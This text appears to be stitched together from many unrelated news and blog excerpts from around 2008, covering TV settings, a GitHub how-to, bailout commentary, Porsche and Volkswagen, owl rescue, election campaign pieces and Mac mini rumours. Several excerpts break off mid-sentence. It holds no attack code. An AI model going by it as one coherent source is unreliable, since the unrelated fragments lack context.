There is a setting in your TV called Motion Interpolation ( or Motionflow , Auto Motion Plus , etc. ) that tries to impose that effect on everything you watch .
Most people do n’t like the “ live ” effect Motion Interpolation causes .
If you ’re one of them , make sure that it ’s turned off in your TV settings .
5. Contrast Enhance
Contrast Enhance or “ Dynamic Contrast ” crush blacks in your picture which can give things a more cinematic and brooding tone .
In doing so however , it also reduces the amount of detail you ’ll find in colors .
We recommend ticking this feature off since watching movies that are already edited to be dark with Contrast Enhance on can make images unwatchable .
6. Noise Reduction Features
Most TV settings are packed with a variety of noise reduction features .
These features ( Smooth Gradiation , Super Resolution , etc. ) aim to cut down on the amount of grain in images .
While noise reduction sounds like a good idea , the way in which TVs go about achieving that end can harm overall picture quality .
If you ’re noticing that your image seems too soft , it could be noise reduction ’s doing .
As a general rule , tick noise reduction settings off for high - quality media ( Blu Ray , 4 K , etc. ) and consider playing with them when dealing with things like SDTV or basic HD .
7. Black Tone and Detail
Black Tone and Detail are the Ying and Yang of ensuring that your TVs picture is displaying the correct levels of darkness .
It ’s best to leave these TV settings where they are by default unless you ’re experiencing big issues .
Typically , if you lighten areas of an image that were edited to be dark , you ’ll introduce a lot of noise to your picture .
8. If All Else Fails , Check Your HDMI Cables
If after playing with the 7 settings above you ’re still not getting the picture quality you ’re expecting , check your HDMI cables .
Many times an HDMI cable that got damaged during a TV installation can be at the root of all of your image woes .
HDMI cables can get bought on Amazon for under $ 10.00 .
You do n’t have to overpay for an HDMI to get good picture quality so if a new “ Amazon Basics HDMI Cable ” is n’t doing the trick for you , consider resetting your TV settings and calling its manufacturer for additional advice .
Wrapping Up How to Adjust Your TV Settings for a Better Viewing Experience
TV settings are there to help people get the most out of their television set .
By ignoring yours , you ’re leaving valuable picture quality on the table and undermining the quality and care your TVs manufacturer ’s put into their product .
Our recommendation is to heed our advice above to turn up your TV viewing experience .
If you ’re still having trouble , again , it ’s best to consult your manufacturer for specific steps on how to make your picture meet your expectations .
For more information on all things tech , entertainment and more , check out additional content on Donklephant today !
What , by contrast , should we demand from GM in return for our largesse ?
I do n't think we have any legislators or regulators with the experience and flair to design new cars or oversee the marketing program , manage the dealer network or decide which lines to cut or gut rehab .
We 'll have to depend on management to do this .
And the management that will be in charge is going to be , in essence , the same management that screwed things up .
Oh , we can replace the people at the top , if we want ( it would probably be a good idea , but I do n't know how it would play politically ) .
But American business writing considerably overstates the value of a CEO .
Not that being a CEO is easy , or that they do n't do valuable work ; I venture to say that 100 % of the commentators who think that running a major company is a matter of riding around on the corporate jet and stealing from the workers and shareholders would be surprised at how quickly the company sank under them if they were thrust into that cushy sinecure .
But while a bad CEO can ruin a good company , it is not necessarily the case that a good CEO can save a bad one .
Big organizations are like ocean liners ; they turn slowly , if at all .
Corporate culture is simply an amazingly powerful thing , almost always beyond the ability of one man ( or woman ) to change .
I have spoken to people at organizations that replaced two thirds of their staff in a buyout , and nonetheless found the old culture running the place rather than the new , dynamic environment they 'd hoped to create .
A very small cadre of old workers can perpetuate the old culture surprisingly well , because they 're united , while the new people coming in have no common culture to bring against the old guard .
Too , CEOs at failing companies are often operating under more legacy constraints than they are given credit for .
One often hears people rail against the UAW when talking about the auto industry ; more rarely do you hear about the supplier network , the dealer network , and the politicians at local , state , and federal levels , all of whom exert considerable leverage over Big Three CEOs .
Congress , or some regulator , has no ability to fix the corporate culture that failed in the first place .
No matter how many executives you fire , the middle management , the engineers and marketers and purchasing agents and sales force , will stay the same .
We do n't have anywhere else to recruit a whole new workforce from , even for a stripped down company .
Even if we were going to go outside the industry and get new people , how on earthy would you persuade them to move to Detroit ?
Maybe you could do it by throwing money at them -- but can you imagine the reaction from Congress if the new Big Three leadership proposed raising management salaries by 30 % ?
Indeed , a bailout will mute the one thing that sometimes does turn around dysfunctional management : the shock value of failure .
Failure is nature 's way of saying " do n't do that anymore ! "
We 're whiting that out and replacing it with " Keep going ! "
THERE is an old dieters ’ joke that anything eaten directly from the fridge has no calories .
Wrong .
But surely anything in a teensy snack pack must help you lose weight , right ?
Wrong again .
Grocery aisles are full of small “ diet packs ” of candy , cookies or fried snacks , advertised as a guilt - free way of helping you eat less .
But Rik Pieters and colleagues at Tilburg University in the Netherlands suspected that diet packs might in fact make people drop their guard and eat more .
They had 140 students watch TV – to rate advertising , they were told – and gave them …
We ’re always looking for counter - narratives to the downer news we ’re obligated to report as the world ’s economy slides into a seemingly bottomless abyss .
Over the weekend , we found a great one : Washington , DC is booming !
The front page of Saturday ’s Washington Post carried the cheery headline “ Wall Street Decamps to K Street for Work on Bailout . ”
The story below tells how the Federal government ’s bailout plan is leading to a booming business for those exposed to the upside of lobbying for government largesse .
Some highlights :
Everyone is getting rich … in Washington .
“ Firms see this as a potential gold mine , ” said Anirban Basu , an economist and chief executive of Sage Policy Group in Baltimore .
For Washington , “ that has to translate into business sales , high - powered restaurant meals , business suit purchases , and travel and luxury hotel stays .
We often talk about D.C. being different economically than the rest of the country and this is perfectly true .
I do n’t see much evidence of a slowdown here . ”
Lawyers and real estate brokers cashing in .
" Commercial real estate brokerage companies have pulled lawyers and salesmen who usually put together deals on downtown offices to work out loans and foreclose on properties .
Some have dubbed themselves the " TARP team " after the Treasury 's Troubled Asset Relief Program created to sort through assets . "
This is huge …for hotels .
" Marriott International 's ExecuStay program , which rents apartments to business travelers for weeks or months at a time , is one beneficiary .
PricewaterhouseCoopers and Ernst & Young -- two big financial advisory companies that have been chosen by Treasury to do bailout work -- have booked dozens of units at Marriott 's 52 properties in the region , paying about $ 4,500 a month per apartment .
" Young Hill , general manager of the D.C. region for Marriott ExecuStay , said she 's had auditors coming in " to look at Fannie Mae staying with us , but that was nowhere near as big as this financial bailout mess .
This is huge . "
PriceWaterhouse told Marriott it would likely need to bring 300 - plus people into the area and " they know they 're going to be here for a while , " Hill said .
Some guests may stay for a few days , other for months . "
Rep. Dennis Kucinich , D - 10 , is excited about the prospects of working with a Democratic president and Congress .
With 505 of 641 precincts reported , Kucinich was on his way to re-election with 129,027 votes ( 56.4 percent ) to 91,091 for Republican challenger Jim Trakas and 8,406 for Paul Conroy .
For the first time in eight years , the chair of the U.S. House of Representatives ' Domestic Policy Subcommittee will have a Democratic president to work with .
But even when Bill Clinton was president , Kucinich stood in the shadows of a Republican majority in Congress .
" Democrats are in a position where we can seize the moment , " said Kucinich , who will start his seventh term next year .
" We 're going to focus on rebuilding America 's economy and we 're going to have to start in place like Cleveland because of its centrality to the manufacturing economy . "
Trakas said he loved politics and pledged to stay involved in some way , either in a volunteer or paid role .
My IRC friends have been after me to use github for what seems like forever .
I finally got around to building my very first github repository for an upcoming Ars article and I thought I 'd share the experience with any readers who have thought about going git ( or gitting going ) but have hesitated .
Here 's a really simple how - to to get you up and going with your first repository .
Create your project .
For my first , simple project , I went ahead and created a new directory on my computer called helloworld and added a README plus , as you 're already expecting , a 5 line Hello World C project .
Install git .
As I work primarily on a Mac , I got my copy of git from git -osx - installer on Google Code .
Many newer Linux distributions come with git already pre-installed .
Type git at the command line to check .
Create a new github account .
It 's extremely easy to do so .
Pop over to github , enter a new user name and your email .
Upload your SSH public key .
If you have not yet done so , add your SSH public key to your account .
Go to your account page , click add another public key , enter a title and your key .
If you have not yet generated one ( check in ~ /.ssh / for a id_rsa.pub file ) , you 'll find instructions for doing so at the github site .
Create a new repository .
The " create a new repository " link ( actual github link ) appears at the top right of your home page .
Enter a project name , optional description and optional homepage URL , and then click Create Repository .
Github moves you to the next stage of repository creation , offering a complete cheat - sheet on the next steps :
Upload your new repository materials .
Return to the command line and basically follow the cheat - sheet steps given to you by github .
When you 're done uploading , return to your web browser and click Continue , which is found after scrolling down to When You Are Done .
Review your repository .
Your repository should be ready to use .
Mine can be found at ars / hello - world .
Github works like any other project hosting site .
You can download , upload , branch , and wiki to your hearts content .
Through seven years of war an exclusive club has quietly flourished at the intersection of network news and wartime commerce .
Its members , mostly retired generals , have had a foot in both camps as influential network military analysts and defense industry rainmakers .
It is a deeply opaque world , a place of privileged access to senior government officials , where war commentary can fit hand in glove with undisclosed commercial interests and network executives are sometimes oblivious to possible conflicts of interest .
Few illustrate the submerged complexities of this world better than Barry McCaffrey .
General McCaffrey , 66 , has long been a force in Washington ’s power elite .
A consummate networker , he cultivated politicians and journalists of all stripes as drug czar in the Clinton cabinet , and his ties run deep to a new generation of generals , some of whom he taught at West Point or commanded in the Persian Gulf war , when he rose to fame leading the “ left hook ” assault on Iraqi forces .
But it was 9/11 that thrust General McCaffrey to the forefront of the national security debate .
In the years since he has made nearly 1,000 appearances on NBC and its cable sisters , delivering crisp sound bites in a blunt , hyperbolic style .
He commands up to $ 25,000 for speeches , his commentary regularly turns up in The Wall Street Journal , and he has been quoted or cited in thousands of news articles , including dozens in The New York Times .
His influence is such that President Bush and Congressional leaders from both parties have invited him for war consultations .
His access is such that , despite a contentious relationship with former Defense Secretary Donald H. Rumsfeld , the Pentagon has arranged numerous trips to Iraq , Afghanistan and other hotspots solely for his benefit .
At the same time , General McCaffrey has immersed himself in businesses that have grown with the fight against terrorism .
The consulting company he started after leaving the government in 2001 , BR McCaffrey Associates , promises to “ build linkages ” between government officials and contractors like Defense Solutions for up to $ 10,000 a month .
He has also earned at least $ 500,000 from his work for Veritas Capital , a private equity firm in New York that has grown into a defense industry powerhouse by buying contractors whose profits soared from the wars in Afghanistan and Iraq .
In addition , he is the chairman of HNTB Federal Services , an engineering and construction management company that often competes for national security contracts .
Many retired officers hold a perch in the world of military contracting , but General McCaffrey is among a select few who also command platforms in the news media and as government advisers on military matters .
These overlapping roles offer them an array of opportunities to advance policy goals as well as business objectives .
But with their business ties left undisclosed , it can be difficult for policy makers and the public to fully understand their interests .
This is a not a picture .
This is a little world in a light bulb .
The very thing we should preserve and treat like our most valuable gift – our ( now ) sensible ecosystem .
I look at this small world and want to believe there ’s still hope for our children to grow up in a world where nature is preserved and respected .
Where the eco conscience prevails .
Until then , I ’ll keep this photo in my mind and the respect for the environment in my heart .
Take an environmental break today and help the world survive !
( photo via pixdaus )
The sports car giant Porsche has pulled off one of the greatest share killings on record in a coup that has left some of the world 's largest hedge funds nursing combined losses that could total $ 20 bn ( £ 12.6bn ) .
The vast sum was won and lost in bets on the share price of Volkswagen .
While Porsche has been building a secret 74 per cent stake in its rival , the hedge funds have been betting that the shares will fall .
The shares soared by 400 per cent in two days , leaving Porsche with a huge profit and the hedge funds – some of which are based in London – with losses that could drive them into bankruptcy .
City traders were stunned by the audacity of Porsche 's move , although there is no suggestion that it broke German law or trading regulations .
Download the new Independent Premium app Sharing the full story , not just the headlines
The sudden rise in Volkswagen 's share price – from about € 200 to more than €900 – was triggered by the announcement at the weekend of Porsche 's share - buying .
The hedge funds had short - sold the shares – in effect a bet that they would fall – and so were left huge losses by the rally .
The Volkswagen debacle is the latest blow for hedge funds .
In the boom years , these investors made dramatic returns – often on behalf of pension funds – by taking huge bets on a variety of financial instruments .
But they have been hit hard by the credit crunch , with markets moving against them and banks increasingly unwilling to lend them money .
Analysts at Morgan Stanley , the investment bank , last week estimated the global hedge fund industry could lose as much as $ 500bn in the value of funds under management in the second half of this year , with Europe worst - hit because of its reliance on short - selling .
They thought they were on to a sure thing with Volkswagen , given the crisis in the global automotive industry .
Last week , VW 's shares tumbled by a third in two days , and hedge funds piled into short positions , expecting it to be the start of a longer - term collapse in the share price .
" Last week when VW came down 50 per cent some people thought it was going to crash , " said one market participant .
" Some funds just said , ' it 'll go all the way now it has broken through so let 's get in ( with a short position ) . ' "
But they had not counted on Porsche 's dramatic intervention .
The maker of the iconic 911 and other sports cars had last year built up a 35 per cent stake in VW , but said at the time it had no plan to buy a majority of the maker of Golf hatchbacks .
Then in March this year Porsche 's supervisory board gave the go - ahead to raise its VW voting stake to more than 50 per cent and thus make the world 's third - largest car maker its subsidiary .
But the company denied reports that it was interested in more control , saying this " overlooks the realities in VW 's shareholder structure , " adding the probability of gaining control of 75 per cent was " extremely low " .
Hence the hedge funds ' belief that VW shares would fall still further – and the stunned reaction to Sunday 's announcement that Porsche controlled 74 per cent of VW 's shares .
The secretive nature of Porsche 's share buying has raised eyebrows , but the authorities in Germany seem untroubled by the car - maker 's tactics .
Daily coronavirus briefing
No hype , just the advice and analysis you need Enter your email address Continue Continue Please enter an email address Email address is invalid Fill out this field Email address is invalid Email already exists .
Log in to update your newsletter preferences
Register with your social account or click here to log in I would like to receive morning headlines Monday - Friday plus breaking news alerts by email Update newsletter preferences
German regulators said yesterday they were examining trades in VW shares , but not the role of Porsche .
" First of all we will check trades in shares of VW to find any points that refer to possible market manipulation or insider trading .
We are looking at the whole process , " said a spokeswoman for BaFin , Germany 's financial markets regulator .
" That is the first step .
If we find points that might look like market manipulation or insider trading then we will launch a formal investigation . "
" We vehemently reject the accusation of share - price manipulation , " a spokesman for Porsche told Reuters , adding that the market seemed to have mixed up cause with effect .
He said : " The ones responsible are those that speculated with huge sums of money on a falling Volkswagen share price . "
Porsche , with Wendelin Wiedeking at the helm , added that it would push for control of the company .
The hedge fund industry has seen huge growth over the past few years , with many ambitious young entrepreneurs , including Nathan Rothschild , opting to enter the sector .
It also poached many senior investment bankers and private equity executives , attracted by the high returns and pay , and relative freedom of working for what are normally small firms .
Hedge funds thought they could outperform traditional investors by using increasingly exotic ways of investing their money .
They also presented themselves as slight rebels , different from the staid financial establishment , often opting to set themselves up in Mayfair , west London , rather than the City or Canary Wharf .
There will be those in Germany who will relish the discomfort of the hedge funds .
In 2004 , a German politician , Franz Muenterfering , described private equity firms and hedge funds as " locusts " .
Betting on failure :
What is short - selling ?
* An investor borrows shares or other assets from the owner
* The shares are sold on the market in the hope that the price will fall
* The aim is to buy back the shares at a lower price .
The borrowed shares are then returned to their owner
* If large numbers of traders short - sell a stock , this can lower the price
* Short - selling can help the market by reducing the price of an over - valued share to a realistic level
This picture of the two of them sharing a pretzel kills me :
And , as promised :
So , longtime Shakers will know I 've never been a huge fan of Joe the Biden , which is frankly quite the understatement , though I have come to understand him a little better , and I 'm trying to take my evolving " good bits and bad bits do n't cancel each other out , but coexist " approach with my feelings about Biden , too .
VAWA good ; offensive jokes bad .
( Evidently this campaign has turned me into a Buddhist Frankenstein 's Monster .
Great . )
Anyway , one of the things by which I have actually been really tickled during this election , during my daily perusal of news photos , is seeing how much goddamned Barack Obama and Joe Biden seem to be having together .
I was reminded of it by Lauredhel 's Thursday Cheezburger , which used one of my favorite Obama - Biden shots from the campaign trail , where both of them are just totally cracking up while buying ice cream :
So , since lots of people have liked other recent photo essays , here 's a collection of some of my favorite snaps of Obama and Biden on the campaign trail ( with a couple of shots at the end of them having a laugh with another favorite Senator around these parts ) .
Enjoy !
Not much :
... in eight of the last nine elections , the winner could have lost swing voters but won the race .
In a second test , which examined voters who were undecided at a later point in the race , Campbell found that the last campaign in which they were decisive was 1960 .
Last updated at 00:55 04 May 2007
A group of orphaned baby owls snuggle up to a cuddly toy which has become their surrogate mum after they were found on the brink of death in the wild .
The tiny tawny owl chicks burrow in under the fluffy toy 's wings to keep warm after they were separated from their own mothers .
The chicks , all aged between just four and eight weeks , faced certain death as they fended for themselves alone in the wild but are now recovering in an animal hospital .
Scroll down for more ...
Two of them , brother and sister Oscar and Olivia , aged four weeks were brought in by a concerned dog walker who found them being clawed to death by a pair of cats .
A fluffy baby aged around six weeks called Thomas was taken to the animal centre by a member of the public who spotted him lying on the edge of a busy road .
And tiny eight - week - old Tamsin narrowly escaped a nasty end when she was discovered by a cyclist tottering along a popular bike path through a forest .
All four of the nocturnal creatures are now being cared for by experts at the New Forest Otter , Owl & Wildlife Park at Longdown in the New Forest , Hants .
After a tough start in life , they are being fed up to full strength in the park 's hospital quarters , where they crave love from their surrogate mum .
The park 's animal manager , John Crooks , said the little chicks may have got lost from their mums in the Hampshire countryside after wandering off before they could fly .
Or they may also have been forced out of the nest by their parents if they were the youngest of a large brood to hatch .
He said : " There 's a lot of misinformation about tawny owls .
" They 're perceived to be very wise animals because of their appearance but really they 're not very bright at all .
" Very often , baby tawny owls will leave their nests high up in trees out of curiosity before they can fly .
" They can clamber around using their claws but it's all too easy for them to fall out of the tree and get lost and they may never be found again by their parents .
" It was desperately sad when these beautiful creatures were brought in because they were so distressed at getting lost from their families or being abandoned .
" They are so cuddly , almost human looking with their big wide eyes and facial expressions , we do find ourselves getting attached to them if we 're not careful .
" But we all know that they are better off in the wild , so we are trying not to get too attached and are doing what we can so that they can be returned to their natural habitat .
" It would be better for them to be brought up by mum and dad in the nest rather than by humans , but we are doing our best to ensure that they get a decent start in life .
" We just feel lucky that they were rescued and brought in when they were .
" Two of them were found by a dog walker who spotted a couple of cats playing with what looked like two balls of fluff .
" Those balls of fluff turned out to be Olivia and Oscar , so the man scared off the cats , wrapped the owls in his coat and brought them in to us .
" A few minutes later , and they might have been mauled to death by the cats .
" Thomas might well have been run over by a car lying there at the side of the road , and Tamsin certainly would n't have lasted long alone on a busy cycle path . "
The four chicks will spend the next few weeks in a shady area of the park 's hospital quarters , which mimics the environment of an owl 's nest .
Then , once their wings and adult feathers are grown , they will be moved to an aviary to spend another month or two learning to fly and building up their muscles .
Experts hope to be able to release the orphans back into the wild when they reach the age of three to four months .
At the moment they are being fed on pieces of diced chicken and rat , and a special calcium and vitamin supplement to help their bones grow stronger .
Mr Crooks said that Oscar and Olivia were severely dehydrated when they were brought in and had to be hand fed to get them back up to strength .
But he added that now all four are growing up fast and healthy .
The group have all bonded and snuggle up close to each other and to the cuddly toy owl dubbed ' mummy owl ' , which has to be washed regularly because she gets so much love .
The babies are also making their first attempts at flight by jumping off objects and flapping their little wings .
The tiny chicks stand just a few inches tall at the moment , but within a couple of months they will grow to be around one foot tall .
Their grey and white feathers will also be replaced with beautiful mottled brown adult plumage to help them camouflage and they will grow wings spanning two feet .
Over time they will be fed larger pieces of meat and whole rodents , before eventually being freed to hunt for prey themselves .
Mr Crooks , 41 , added : " In some ways they will have a better start on their peers in the wild , because they will have been better fed .
" They may lack a bit of confidence and skill in the air , but they will get the hang of that in no time . "
Park keepers are also worried because owl breeding has been unusually early this year - a phenomenon they believe is evidence of global warming .
Some owls have already raised two broods this Spring , which is extremely rare .
Tawny
Owls , famed for their ' tu - whit tu - whoo ' hoots in the night are one of the most common breeds of owl in the UK .
Of course , you will remember them ; they were that horrible , poorly designed navigation icons you seen everywhere on the internet .
That was the days when graphic design and web design were so far apart that every site you turned to looked ugly , and they were made worse by those little blinking , vividly colored images that were trying to point you in the right direction .
Of course , I used them as well , who did n’t ?
I would n’t call this a showcase , maybe a line - up .
Have a look at these gifs from a now , thankfully , bygone era .
Internet Explorer and Netscape Animated GIFs my favourites
Homepage Animated GIFs
Email or Contact Animated GIFs
Download Animated GIFs
Statistics Animated GIFs
Under Construction Animated GIFs
Seperator / Lines / Breaks Animated GIFs
Arrows Animated GIFs
Animated Text GIFs
Next Week : Elements of UGLY Web Design : 2 . Inline Frames .
If you ’ve had urge for sweets – go for a walk !
Spending just 15 minutes outdoors would replace the tastiest chocolate for you , according to British scientists .
The scientists of the University of Exeter found out that even short - time physical activity is enough to lower the irresistible desire for a cigarette or food – in particular , for sweets .
The neurologists suggest that in the brain zones of people who are addicted to cigarettes or food the equal processes take place , and it may happen that during physical activity special agents are produced that help lift our spirits and lower the pernicious desire .
People – devoted chocolate lovers – who were involved in the experiments were forbidden to eat dainties and instead of this were suggested to choose between active walk and rest .
Then they were given some easy tasks which could excite chocolate desire – for example , to solve a quiz or , moreover , to unpack a bar of chocolate .
The results showed that those who had come back from walk were feeling less desire for the dainty than those who simply had a rest .
Besides , the effect was kept for at least 10 minutes after walk .
This is the first scientific evidence that physical activity could lower food addiction .
Earlier it was known about the good effect of physical exercises on people willing to get rig of nicotinic or weak narcotic addiction .
According to the previous studies , 97 % of women and 68 % of men are food - addicted .
And the most of products which are the objects of strong addiction are those of high - calorie high fat and sugar content .
Chocolate is out of competition among them .
A long time ago it was proved that chocolate contains much of biologically active elements which are able to improve the mood and thus , making a person addictive to chocolate .
The results of the research were published in the magazine Appetite and undoubtedly will be good news for people who are really trying to fight food addiction and want to lose weight .
Food addiction is similar to a drug addiction .
It can be impossible to resist the urge , but like drug addiction treatment , there are programs to help overeaters .
Victoria Ann Chacon Arrested for Sending Topless Photos to 14 Year Old
, a 27 year old former teacher , was arrested Tuesday on charges of distributing harmful material to a minor .
The charge stems from an incident that first surfaced in March when a 14 year old San Antonio area teen 's parents found racy love letters written by Chacon .
The arrest affidavit states that in two letters , " Chacon professes her love for the teen , about how passionate he is , and about how she feels when she and the teen kiss each other . "
Police were not able to get a statement from the boy until a few months later when his parents found Chacon 's cellphone in their son's possession that had topless photos of Chacon .
The two first met at church , where Chacon served as the unnamed boy 's Sunday School teacher .
Chacon was placed on administrative leave from Somerset Junior High School when the initial allegations were raised , according to Somerset Independent School District spokesman Maury Vasques .
She resigned shortly thereafter .
The district has found no evidence of inappropriate contact between Chacon and her Somerset students while she was employed as a teacher .
The 14 year old boy in question does not attend school in Somerset school district .
Hockey Mom Sarah Palin was welcomed in the city of brotherly love Saturday night with a resounding chorus of boos when she took center ice for the ceremonial puck drop .
Gotta love the clearly visible Obama / Biden signs in the background .
Lynn Zinser of the Times reports that Palin was greeted with " resounding ( almost defeaning ) boos . "
FOX News , on the other hand , reports that the reaction " mixed . "
Who 's right ?
Jed put together this clip comparing the real footage with the footage FOX uses to make its case .
See for yourself .
Looks like Sarah brought her daughters along as a human shields :
The GOP Vice - Presidential nominee said at an earlier fundraiser that she would stop some of the booing from the rowdy Philadelphia fans by putting her seven year old daughter , Piper in a Flyers jersey .
She said , " How dare they boo Piper ! "
Stay classy , Wasilla .
By the way , Rangers won 4 - 3 and improved their record to 4 - 0 , making this their best start in 25 years .
Only 78 wins away from a perfect season .
I ’m sure one has nothing to do with the other :
Wikipedia : In October 2008 , Cuban started Bailoutsleuth.com as a grassroots , online portal for oversight over the US government 700 billion dollar “ bailout ” of financial institutions .
And today :
Dallas Mavericks owner Cuban charged with insider trading
Entrepreneur Mark Cuban , owner of the National Basketball Association ’s Dallas Mavericks , was charged Monday by the Securities and Exchange Commission with insider trading .
According to the SEC , Cuban sold 600,000 shares of Internet search company Mamma.com in June 2004 using non-public information .
Cuban is accused of calling his broker and instructing him to sell all of his stock from the Mamma.com after receiving confidential information from the company .
The SEC said Cuban knew the stock price was about to fall .
There has been a lot of speculation that Barack Obama might win the election due to his better " ground game " and superior campaign organization .
I had the chance to view that organization up close this month when I canvassed for him .
I 'm not sure I learned much about his chances , but I learned a lot about myself and about this election .
Let me make it clear : I 'm pretty conservative .
I grew up in the suburbs .
I voted for George H.W. Bush twice , and his son once .
I was disappointed when Bill Clinton won , and disappointed he could n't run again .
I encouraged my son to join the military .
I was proud of him in Afghanistan , and happy when he came home , and angry when he was recalled because of the invasion of Iraq .
I 'm white , 55 , I live in the South and I 'm definitely going to get a bigger tax bill if Obama wins .
I am the dreaded swing voter .
So you can imagine my surprise when my wife suggested we spend a Saturday morning canvassing for Obama .
I have never canvassed for any candidate .
But I did , of course , what most middle - aged married men do : what I was told .
At the Obama headquarters , we stood in a group to receive our instructions .
I was n't the oldest , but close , and the youngest was maybe in high school .
I watched a campaign organizer match up a young black man who looked to be college age with a white guy about my age to canvas together .
It should not have been a big thing , but the beauty of the image did not escape me .
Instead of walking the tree - lined streets near our home , my wife and I were instructed to canvass a housing project .
A middle - aged white couple with clipboards could not look more out of place in this predominantly black neighborhood .
We knocked on doors and voices from behind carefully locked doors shouted , " Who is it ? "
" We 're from the Obama campaign , " we 'd answer .
And just like that doors opened and folks with wide smiles came out on the porch to talk .
Grandmothers kept one hand on their grandchildren and made sure they had all the information they needed for their son or daughter to vote for the first time .
Young people came to the door rubbing sleep from their eyes to find out where they could vote early , to make sure their vote got counted .
We knocked on every door we could find and checked off every name on our list .
We did our job , but Obama may not have been the one who got the most out of the day 's work .
I learned in just those three hours that this election is not about what we think of as the " big things . "
It 's not about taxes .
I 'm pretty sure mine are going to go up no matter who is elected .
It 's not about foreign policy .
I think we 'll figure out a way to get out of Iraq and Afghanistan no matter which party controls the White House , mostly because the people who live there do n't want us there anymore .
I do n't see either of the candidates as having all the answers .
I 've learned that this election is about the heart of America .
It 's about the young people who are losing hope and the old people who have been forgotten .
It 's about those who have worked all their lives and never fully realized the promise of America , but see that promise for their grandchildren in Barack Obama .
The poor see a chance , when they often have few .
I saw hope in the eyes and faces in those doorways .
My wife and I went out last weekend to knock on more doors .
But this time , not because it was her idea .
I do n't know what it 's going to do for the Obama campaign , but it 's doing a lot for me .
Jonathan Curley is a banker .
He voted for George H.W. Bush twice and George W. Bush once .
First on AI : With Apple 's recent ' State of the Mac ' omitting any mention of the Mac mini and reports surfacing over the current line 's discontinuation , there 's been some speculation that the diminutive desktop 's days may ( again ) be numbered .
That 's unlikely the case , say insiders , who are sharing new details .
In a report published in May of 2007 , AppleInsider wrote off the mini , noting that development of the systems had screeched to a halt inside Apple , with little engineering effort having gone into the systems since an update to Intel 's Core 2 Duo architecture a year earlier .
The mini was essentially shelved , lingering in a state of indefinite limbo ; its development team reportedly dissolved .
With little effort , Apple bumped the mini's processor , memory , and hard drive specs in August of 2007 .
The systems have n't Â seen a public update since .
Earlier this year , however — and shortly after NVIDIA pitched its new integrated graphics chipsets to Apple — AppleInsider reported a pulse in the Mac mini department .
The tiny systems were reportedly coming out of their coma , with a dedicated team of engineers performing the first top - to - bottom reconstruction since the product 's inception three year 's earlier .
In a report published this week titled the " The State of the Mac mini , " Las Vegas - based Macminicolo , the largest Mac mini colocation firm , reaches the same conclusions .
The company , which operates a server farm of 400 Mac minis , notes that " it 's just about as familiar with the Mac mini as anyone " and claims it " is certain there is another mini on the way . "
The report both attempts to dispel some common misconceptions about the mini's sales volume , as well as outline a few features that are said to be " 100 % confirmed " for the impending update .
Specifically , it notes that the mini sells to businesses over consumers at roughly a 2 to 1 ratio .
" For instance , here in Las Vegas , I know there are at least 10,000 Mac minis running in the different hotels and casinos on the strip , " said Brian Stucki , who owns and operates the Mac mini colocation service .
" Many are used for video security points .
Certain casino companies use Mac minis in each of the slot islands on a casino floor to manage the backend .
I know of one nationwide salon franchise that uses two Mac minis for each one of their stores . "
He tells AppleInsider that small businesses comprise the majority of his clientele , primarily due to cost savings .
Not only does a mini fetch about one fourth the cost of an Xserve , but hosting fees for the smaller systems are similarly a quarter of that of the Apple rack - mount servers .
The above photos show Macminicolo 's server room with roughly 400 Mac minis in operation | Photo : macminicolo , AppleInsider .
" When I read online of people stating ' poor mini sales , ' I 'm surprised , " Stucki wrote in theÂ this week 's report .
" The Mac mini is consistently in the top five of Amazon 's Bestselling Desktop Computers .
( It 's currently number one . )
If you watch Apple 's Refurb site , anytime some Mac minis are posted they sell out in under an hour .
Even the three year old G4 Mac minis on ebay go for a price close to the brand new Intel machines sticker price .
The market speaks even if Apple does n't . "
Looking ahead , he claims to have confirmed two of the following with " 100 % " certainty , while another is a highly probable guess based on recent changes to Apple 's product lines :
The Mac mini will adopt the new Mini DisplayPort that was recently showcased on the Macbook line .
This will save considerable port real estate on the back of the Mac mini .
The Mac mini will join all other Macs in being able to address 4GB of RAM .
Currently , they are officially sold with up to 2GB of RAM , but can also support 3GB of RAM .
( Though the latter configuration loses the minor dual channel benefits . )
Like the new Macbook , the Mac mini optical drive will be changed to a SATA connection .
( It is currently a standard ATA / IDE cable . )
This will increase performance .
But even more , it will benefit those who use the Mac mini as a server .
In ordering a Mac mini from Apple , there will be an option to have two SATA HDDs and eliminating the optical all together .
With the new Remote Disc introduced with the Macbook Air , this option will be tempting for many .
Stucki says his customers commonly employ Mac minis as web , mail , video and file servers .
They 're also sometimes used to handle financial transaction or act as remote watchdogs for larger , more intricate servers .
However , the advent of the App Store has reportedly sparked an alternative interest in the little desktops .
Some developers who intend to write applications that take advantage of the iPhone 's planned push notification features are considering minis as a backend for their apps .
Others , whose applications facilitate user logins like MobileChat , have recently chosen minis for rapid scalability .
In August , Apple began informing some small European resellers that they should no longer expect shipments of the current Mac mini models .
More recently , however , the company issued a broader announcement to European resellers — Â first reported by Gizmodo and later corroborated by MacBidouille — that the existing Mac mini was going EOL , or being discontinued .
Stefan Savage , the University of California , San Diego computer science professor who led the research , warned that the public should treat a key like a credit card , and " keep it in your pocket unless you need to use it . "
Tunnelling nanotubes seem to play a major role in anything from how our immune system responds to attacks , to how damaged muscle is repaired after a heart attack ( Image : Paul McMenamin / UWA )
HAD Amin Rustom not messed up , he would not have stumbled upon one of the biggest discoveries in biology of recent times .
It all began in 2000 , when he saw something strange under his microscope .
A very long , thin tube had formed between two of the rat cells that he was studying .
It looked like nothing he had ever seen before .
His supervisor , Hans - Hermann Gerdes , asked him to repeat the experiment .
Rustom did , and saw nothing unusual .
When Gerdes grilled him , Rustom admitted that the first time around he had not followed the standard protocol of swapping the liquid in which the cells were growing between observations .
Gerdes made him redo the experiment , mistakes and all , and there they were again : long , delicate connections between cells .
This was something new – a previously unknown way in which animal cells can communicate with each other .
Gerdes and Rustom , then at Heidelberg University in Germany , called the connections tunnelling nanotubes .
Aware that they might be onto something significant , the duo slogged away to produce convincing evidence and eventually published a landmark paper in 2004 ( Science , vol 303 , p 1007 ) .
A mere curiosity ?
At the time , it was not clear whether these structures were anything more than a curiosity seen only in peculiar circumstances .
Since their pioneering paper appeared , however , other groups have started finding nanotubes in all sorts of places , from nerve cells to heart cells .
And far from …
Any day now , President Bush ’s secretary of health and human services , Michael Leavitt , is expected to deliver a parting blow to women ’s reproductive freedom : new regulations further limiting access to abortions , contraceptives and accurate information about reproductive health care options .
If that happens , it will be a big victory for the far - right  one , as it happens , that is partly rooted in an old controversy involving Sarah Palin ’s church , her former obstetrician and the small local hospital serving Wasilla , Alaska .
